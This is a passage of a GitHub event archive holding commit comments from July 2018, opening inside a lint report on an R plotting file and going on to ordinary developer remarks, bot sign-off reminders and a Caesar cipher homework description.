draw_line_segments(endpoints)\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:267:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L267) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description put a degree label at the ends of the endpoints for each longitude\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:274:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L274) *style:* **Lines should not be more than 80 characters.**\n```r\n​plot_longitudinal_labels <- function(axis.rad, outer_radius, r_label, l_label, degree) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:274:38:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L274) *style:* **Variable or function name should be snake_case.**\n```r\n​plot_longitudinal_labels <- function(axis.rad, outer_radius, r_label, l_label, degree) {\n                                     ^~~~~~~~\n```\n[R/plotting_functions.R:275:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L275) *style:* **Lines should not be more than 80 characters.**\n```r\n​    write_labels_at_endpoint_locations(r_label, l_label, degree, compute_longitude_label_location(axis.rad, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:275:108:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L275) *style:* **Trailing whitespace is superfluous.**\n```r\n​    write_labels_at_endpoint_locations(r_label, l_label, degree, compute_longitude_label_location(axis.rad, \n                                                                                                           ^\n```\n[R/plotting_functions.R:285:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L285) *style:* **Variable or function name should be snake_case.**\n```r\n​RMat <- function(radians) {\n^~~~\n```\n[R/plotting_functions.R:286:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L286) *style:* **Lines should not be more than 80 characters.**\n```r\n​    return(matrix(c(cos(radians), sin(radians), -sin(radians), cos(radians)), ncol = 2))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:290:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L290) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description plots radial lines, degree label for latitudes, and plots radial spokes with labels\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:295:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L295) *warning:* **no visible global function definition for ‘plot_circle_radial_lines’**\n```r\n​    plot_circle_radial_lines(radius_vals)\n    ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:296:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L296) *warning:* **no visible global function definition for ‘plot_degree_label_for_latitudes’**\n```r\n​    plot_degree_label_for_latitudes(outer_radius, radius_vals)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:297:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L297) *warning:* **no visible global function definition for ‘plot_radial_spokes_and_labels’**\n```r\n​    plot_radial_spokes_and_labels(outer_radius)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:324:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L324) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​define_color_breaks_based_on_source <- function(col_breaks_source, z, Mat) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:324:71:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L324) *style:* **Variable or function name should be snake_case.**\n```r\n​define_color_breaks_based_on_source <- function(col_breaks_source, z, Mat) {\n                                                                      ^~~\n```\n[R/plotting_functions.R:329:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L329) *style:* **Lines should not be more than 80 characters.**\n```r\n​    } else if ((length(col_breaks_source) == 2) & (is.numeric(col_breaks_source))) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:346:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L346) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param extrapolate whether to predict out to the equator of the eye, even if no data exists nearby.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:347:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L347) *style:* **Lines should not be more than 80 characters.**\n```r\n​interpolate_input_data <- function(minitics, x, y, z, lambda, polynomial_m, extrapolate) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:348:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L348) *style:* **Lines should not be more than 80 characters.**\n```r\n​    grid.list = list(x = minitics, y = minitics)  #choose locations to predict at\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:348:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L348) *style:* **Variable or function name should be snake_case.**\n```r\n​    grid.list = list(x = minitics, y = minitics)  #choose locations to predict at\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:348:15:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L348) *style:* **Use <-, not =, for assignment.**\n```r\n​    grid.list = list(x = minitics, y = minitics)  #choose locations to predict at\n              ^\n```\n[R/plotting_functions.R:349:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L349) *style:* **Lines should not be more than 80 characters.**\n```r\n​    t <- Tps(cbind(x, y), z, lambda = lambda, m = polynomial_m)  #computationally intensive\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:349:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L349) *warning:* **no visible global function definition for ‘Tps’, Did you mean 'Ops'?**\n```r\n​    t <- Tps(cbind(x, y), z, lambda = lambda, m = polynomial_m)  #computationally intensive\n         ^~~\n```\n[R/plotting_functions.R:350:12:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L350) *warning:* **no visible global function definition for ‘predictSurface’**\n```r\n​    tmp <- predictSurface(t, grid.list, extrap = extrapolate)\n           ^~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:351:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L351) *style:* **Variable or function name should be snake_case.**\n```r\n​    Mat <- tmp$z\n    ^~~\n```\n[R/plotting_functions.R:363:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Variable or function name should be snake_case.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:363:25:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                       ~^~\n```\n[R/plotting_functions.R:363:31:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                             ~^~\n```\n[R/plotting_functions.R:363:37:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                                   ~^~\n```\n[R/plotting_functions.R:363:47:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                                             ~^~\n```\n[R/plotting_functions.R:363:57:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                                                       ~^~\n```\n[R/plotting_functions.R:364:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L364) *style:* **Variable or function name should be snake_case.**\n```r\n​    r.labs <- c(90, 60, 30, 0, 330, 300)\n    ^~~~~~\n```\n[R/plotting_functions.R:365:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L365) *style:* **Variable or function name should be snake_case.**\n```r\n​    l.labs <- c(270, 240, 210, 180, 150, 120)\n    ^~~~~~\n```\n[R/plotting_functions.R:367:9:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L367) *warning:* **no visible global function definition for ‘plot_longitudinal_lines’**\n```r\n​        plot_longitudinal_lines(axis.rads[i], outer_radius)\n        ^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:368:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L368) *style:* **Lines should not be more than 80 characters.**\n```r\n​        plot_longitudinal_labels(axis.rads[i], outer_radius, r.labs[i], l.labs[i], \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:368:83:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L368) *style:* **Trailing whitespace is superfluous.**\n```r\n​        plot_longitudinal_labels(axis.rads[i], outer_radius, r.labs[i], l.labs[i], \n                                                                                  ^\n```\n[R/plotting_functions.R:389:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L389) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description Useful for making the falciform process look more smooth and refined. This is purely aesthetic.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:390:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L390) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @details enhance the resolution of a polygon vertices dataframe by creating a spline along each vertex.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:391:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L391) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param xy vertices in dataframe with x and y columns, in order (not all are used).\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:398:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L398) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @references http://gis.stackexchange.com/questions/24827/how-to-smooth-the-polygons-in-a-contour-map\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:407:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L407) *style:* **Variable or function name should be snake_case.**\n```r\n​    data.spline <- spline(1:(n + 2 * k), data[, 1], n = vertices, ...)\n    ^~~~~~~~~~~\n```\n[R/plotting_functions.R:411:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L411) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n"}},"created_at":"2018-07-03T01:17:37Z"}
{"id":"7909703094","type":"CommitCommentEvent","actor":{"login":"phillbaker"},"repo":{"name":"narmitech/homebrew-versions"},"payload":{"comment":{"id":29574126,"position":7,"line":7,"path":"README.md","commit_id":"e6d65a3ccc63c89ead68c29f47457e1df302f261","created_at":"2018-07-03T01:17:51Z","updated_at":"2018-07-03T01:17:51Z","author_association":"MEMBER","body":"Oh, because the taps are named the same, I guess you can't just ignore it and deal with them one by one. You can have duplicate formula in different taps. Maybe better to name this tap `narmi/homebrew`?"}},"created_at":"2018-07-03T01:17:51Z"}
{"id":"7909704839","type":"CommitCommentEvent","actor":{"login":"Agelil"},"repo":{"name":"Agelil/rageserver"},"payload":{"comment":{"id":29574133,"position":null,"line":null,"path":null,"commit_id":"e7edb550f74580efbd84a7ad634128011296c581","created_at":"2018-07-03T01:18:36Z","updated_at":"2018-07-03T01:18:36Z","author_association":"OWNER","body":"Добавлена проверка по IP."}},"created_at":"2018-07-03T01:18:36Z"}
{"id":"7909705031","type":"CommitCommentEvent","actor":{"login":"andymeek"},"repo":{"name":"eostoolkit/eostoolkit"},"payload":{"comment":{"id":29574134,"position":null,"line":null,"path":null,"commit_id":"88bfe1fb4160913a4ec06818b22872657ad0fdd3","created_at":"2018-07-03T01:18:40Z","updated_at":"2018-07-03T01:18:40Z","author_association":"NONE","body":"Great work!"}},"created_at":"2018-07-03T01:18:40Z"}
{"id":"7909712426","type":"CommitCommentEvent","actor":{"login":"apoorv-goel"},"repo":{"name":"apoorv-goel/Used_Car_Price_Prediction"},"payload":{"comment":{"id":29574150,"position":null,"line":null,"path":null,"commit_id":"b752a8018596a6ab76cb5b4b01929ef05c480175","created_at":"2018-07-03T01:21:36Z","updated_at":"2018-07-03T01:21:36Z","author_association":"OWNER","body":"Presentation FIle"}},"created_at":"2018-07-03T01:21:36Z"}
{"id":"7909713260","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29574152,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-03T01:21:55Z","updated_at":"2018-07-03T01:21:55Z","author_association":"NONE","body":"OK, NVM, got it working -\r\n\r\n![image](https://user-images.githubusercontent.com/1075274/42193665-27c9f54a-7e70-11e8-8fba-3975eb65b403.png)\r\n\r\nThis is what you meant by the non-OIT renderer still having some mismatched gouraud shaded tiles in the distance right?\r\n\r\nIf this is in line with what the graphical results are on your end, then that is good."}},"created_at":"2018-07-03T01:21:55Z"}
{"id":"7909713910","type":"CommitCommentEvent","actor":{"login":"williamkimball"},"repo":{"name":"williamkimball/small-business"},"payload":{"comment":{"id":29574154,"position":null,"line":null,"path":null,"commit_id":"cc323aa258e84339081f840443f87eaf6eb8b167","created_at":"2018-07-03T01:22:10Z","updated_at":"2018-07-03T01:22:10Z","author_association":"OWNER","body":"Looks like I must have it locally! I'll get that fixed ASAP!"}},"created_at":"2018-07-03T01:22:10Z"}
{"id":"7909714856","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29574155,"position":null,"line":null,"path":null,"commit_id":"8570ada154653542ef3f4d0431e18e067bc334fa","created_at":"2018-07-03T01:22:32Z","updated_at":"2018-07-03T01:22:32Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-03T01:22:32Z"}
{"id":"7909716945","type":"CommitCommentEvent","actor":{"login":"rickyzhang82"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29574161,"position":null,"line":null,"path":null,"commit_id":"2446384d762563d50b432455d07829d37d805dd3","created_at":"2018-07-03T01:23:24Z","updated_at":"2018-07-03T01:23:24Z","author_association":"NONE","body":"You'd better split this commit into two. One for sdkconfig, another for the feature. "}},"created_at":"2018-07-03T01:23:24Z"}
{"id":"7909731811","type":"CommitCommentEvent","actor":{"login":"hxqqqqqq"},"repo":{"name":"TheMagician1/redmine_backlogs"},"payload":{"comment":{"id":29574178,"position":null,"line":null,"path":null,"commit_id":"75b8c77a95e671e0efbb6deb89fc500167057652","created_at":"2018-07-03T01:29:24Z","updated_at":"2018-07-03T01:29:24Z","author_association":"NONE","body":"when i config backlogs. the submit button is gray all time.  what the plugin's rules? could you help me?"}},"created_at":"2018-07-03T01:29:24Z"}
{"id":"7909739290","type":"CommitCommentEvent","actor":{"login":"luanpanno"},"repo":{"name":"luanpanno/recipes"},"payload":{"comment":{"id":29574188,"position":5,"line":10,"path":"cake-recipe.txt","commit_id":"583666c751676e75c4ad4cca5a16144a8a53fe09","created_at":"2018-07-03T01:32:17Z","updated_at":"2018-07-03T01:32:17Z","author_association":"OWNER","body":"Misspelled \"canola\""}},"created_at":"2018-07-03T01:32:17Z"}
{"id":"7909745100","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29574202,"position":null,"line":null,"path":null,"commit_id":"c102c3b0f160d994d8202606559aeec4c63ac382","created_at":"2018-07-03T01:34:44Z","updated_at":"2018-07-03T01:34:44Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-03T01:34:44Z"}
{"id":"7909746507","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29574205,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-03T01:35:17Z","updated_at":"2018-07-03T01:35:17Z","author_association":"NONE","body":"It will still be troff, but there will be some incompatibilities, mostly to do with incorrect document coding and updating things so they have a more recent behavior.  For these reasons, in addition to not fully knowing what will end up changing, I think a separate development path would make it apparent that the code isn't supposed to act exactly like n-t-roff.\n\n> This name could contain troff in it like the existing commercial troff variants.\n\nWell, this got my attention.  I was not aware any of those were still around!\n\n‐‐‐‐‐‐‐ Original Message ‐‐‐‐‐‐‐\nOn June 25, 2018 1:33 PM, n-t-roff <notifications@github.com> wrote:\n\n> I would expect, that all typesetting interested users would use to the new repository.\n>\n> Somehow keeping nroff compatibility for manpage processing would be important for me. Keep it possible for others to process their existing troff documents could also be important for some users.\n>\n> How about copying all nroff and troff code into a new directory, continue development there and give the resulting advanced troff binary an new name? (This name could contain troff in it like the existing commercial troff variants.)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, [view it on GitHub](https://github.com/n-t-roff/heirloom-doctools/commit/fd2816bbce0e5f8830e5c977cdaf8d322d84db10#commitcomment-29489043), or [mute the thread](https://github.com/notifications/unsubscribe-auth/AMxHvxPdJhN9dPgFKuOL82V4gCh7nXGBks5uASzfgaJpZM4F4WOT)."}},"created_at":"2018-07-03T01:35:17Z"}
{"id":"7909746792","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29574207,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-03T01:35:25Z","updated_at":"2018-07-03T01:35:25Z","author_association":"NONE","body":"Finally backported both flat shading and bump mapping over and made GL3.0 core profile the new default for the non-OIT renderer - this does come at a heavy performance cost though. I think we went from 190/200fps to 110fps now in Soul Calibur.\r\n\r\nSo what I will do is, I will turn the current 'master' non-OIT renderer in a GL3 renderer, and I will take the 'old' non-OIT renderer that didn't have bump mapping and flat shading and turn that into a GLES2 renderer. Then I will add a setting so that the user can select inbetween them."}},"created_at":"2018-07-03T01:35:25Z"}
{"id":"7909747153","type":"CommitCommentEvent","actor":{"login":"elitecasper"},"repo":{"name":"elitecasper/cipher_algorithm"},"payload":{"comment":{"id":29574208,"position":null,"line":null,"path":null,"commit_id":"1e436c477ca0753d6be4a5c0a7686f5218719892","created_at":"2018-07-03T01:35:34Z","updated_at":"2018-07-03T01:35:34Z","author_association":"OWNER","body":"Introduction\r\nEncryption is the process of obscuring information to make it unreadable without special knowledge. For centuries, people have devised schemes to encrypt messages - some better than others - but the advent of the computer and the Internet revolutionized the field. These days, it's hard not to encounter some sort of encryption, whether you are buying something online or logging into a shared computer system. Encryption lets you share information with other trusted people, without fear of disclosure.\r\n\r\nA cipher is an algorithm for performing encryption (and the reverse, decryption). The original information is called plaintext. After it is encrypted, it is called ciphertext. The ciphertext message contains all the information of the plaintext message, but it is not in a format readable by a human or computer without the proper mechanism to decrypt it; it should resemble random gibberish to those for whom it is not intended.\r\n\r\nA cipher usually depends on a piece of auxiliary information, called a key. The key is incorporated into the encryption process; the same plaintext encrypted with two different keys should have two different ciphertexts. Without the key, it should be difficult to decrypt the resulting ciphertext into readable plaintext.\r\n\r\nThis assignment will deal with a well-known (though not very secure) encryption method called the Caesar cipher. Some vocabulary to get you started on this problem:\r\n\r\nEncryption - the process of obscuring or encoding messages to make them unreadable until they are decrypted\r\nDecryption - making encrypted messages readable again by decoding them\r\nCipher - algorithm for performing encryption and decryption\r\nPlaintext - the original message\r\nCiphertext - the encrypted message. Note: a ciphertext still contains all of the original message information, even if it looks like gibberish.\r\nThe Caesar Cipher\r\n\r\nThe idea of the Caesar Cipher is to pick an integer and shift every letter of your message by that integer. In other words, suppose the shift is k . Then, all instances of the i-th letter of the alphabet that appear in the plaintext should become the (i+k)-th letter of the alphabet in the ciphertext. You will need to be careful with the case in which i + k > 26 (the length of the alphabet). Here is what the whole alphabet looks like shifted three spots to the right:\r\n\r\nOriginal:  a b c d e f g h i j k l m n o p q r s t u v w x y z\r\n 3-shift:  d e f g h i j k l m n o p q r s t u v w x y z a b c\r\nUsing the above key, we can quickly translate the message \"happy\" to \"kdssb\" (note how the 3-shifted alphabet wraps around at the end, so x -> a, y -> b, and z -> c).\r\n\r\nNote!! We are using the English alphabet for this problem - that is, the following letters in the following order:\r\n\r\n>>> import string\r\n>>> print string.ascii_lowercase\r\nabcdefghijklmnopqrstuvwxyz\r\nWe will treat uppercase and lowercase letters individually, so that uppercase letters are always mapped to an uppercase letter, and lowercase letters are always mapped to a lowercase letter. If an uppercase letter maps to \"A\", then the same lowercase letter should map to \"a\". Punctuation and spaces should be retained and not changed. For example, a plaintext message with a comma should have a corresponding ciphertext with a comma in the same position.\r\n\r\n|    plaintext    |  shift    |  ciphertext      |\r\n| ----------------|-----------|------------------|\r\n| 'abcdef'        |    2      |  'cdefgh'        |\r\n| 'Hello, World!' |    5      |  'Mjqqt, Btwqi!' |\r\n| ''              | any value |  ''              |\r\nWe implemented for you two helper functions: load_words and is_word. You may use these in your solution and you do not need to understand them completely, but should read the associated comments. You should read and understand the helper code in the rest of the file and use it to guide your solutions."}},"created_at":"2018-07-03T01:35:34Z"}
{"id":"7909748239","type":"CommitCommentEvent","actor":{"login":"crossbr"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29574211,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T01:36:00Z","updated_at":"2018-07-03T01:36:00Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-03T01:36:00Z"}
{"id":"7909754953","type":"CommitCommentEvent","actor":{"login":"snarkyllama"},"repo":{"name":"AugustCorp/augu.me"},"payload":{"comment":{"id":29574222,"position":null,"line":null,"path":null,"commit_id":"3b73457751f907769ced44894438f4cc1a37a232","created_at":"2018-07-03T01:38:49Z","updated_at":"2018-07-03T01:38:49Z","author_association":"CONTRIBUTOR","body":"also why do I have push access to this repo"}},"created_at":"2018-07-03T01:38:49Z"}
{"id":"7909760573","type":"CommitCommentEvent","actor":{"login":"allanregistos"},"repo":{"name":"allanregistos/timetrex"},"payload":{"comment":{"id":29574229,"position":null,"line":null,"path":null,"commit_id":"ef91a87366950729d51a4711371ae8e79f73b355","created_at":"2018-07-03T01:41:09Z","updated_at":"2018-07-03T01:41:09Z","author_association":"OWNER","body":"Shows blank combobox after adding the class."}},"created_at":"2018-07-03T01:41:09Z"}
{"id":"7909760613","type":"CommitCommentEvent","actor":{"login":"brianalika"},"repo":{"name":"carriedowling/bikeShed"},"payload":{"comment":{"id":29574230,"position":10,"line":10,"path":"index.html","commit_id":"1e5529649cc6dc1e4b21ac484d943943b1a6cc86","created_at":"2018-07-03T01:41:10Z","updated_at":"2018-07-03T01:41:10Z","author_association":"COLLABORATOR","body":"I appreciate your spelling of the word \"dog.\" It shows pizzazz."}},"created_at":"2018-07-03T01:41:10Z"}
{"id":"7909766596","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29574237,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T01:43:31Z","updated_at":"2018-07-03T01:43:31Z","author_association":"NONE","body":"Congrats! "}},"created_at":"2018-07-03T01:43:31Z"}
{"id":"7909766731","type":"CommitCommentEvent","actor":{"login":"milkmeowo"},"repo":{"name":"its-tech/nginx-1.14.0-research"},"payload":{"comment":{"id":29574238,"position":14,"line":1451,"path":"src/http/ngx_http.c","commit_id":"a8773a0c38ffcd66278417ca3399b3d8e8b46d91","created_at":"2018-07-03T01:43:34Z","updated_at":"2018-07-03T01:43:34Z","author_association":"NONE","body":"forfor？"}},"created_at":"2018-07-03T01:43:34Z"}
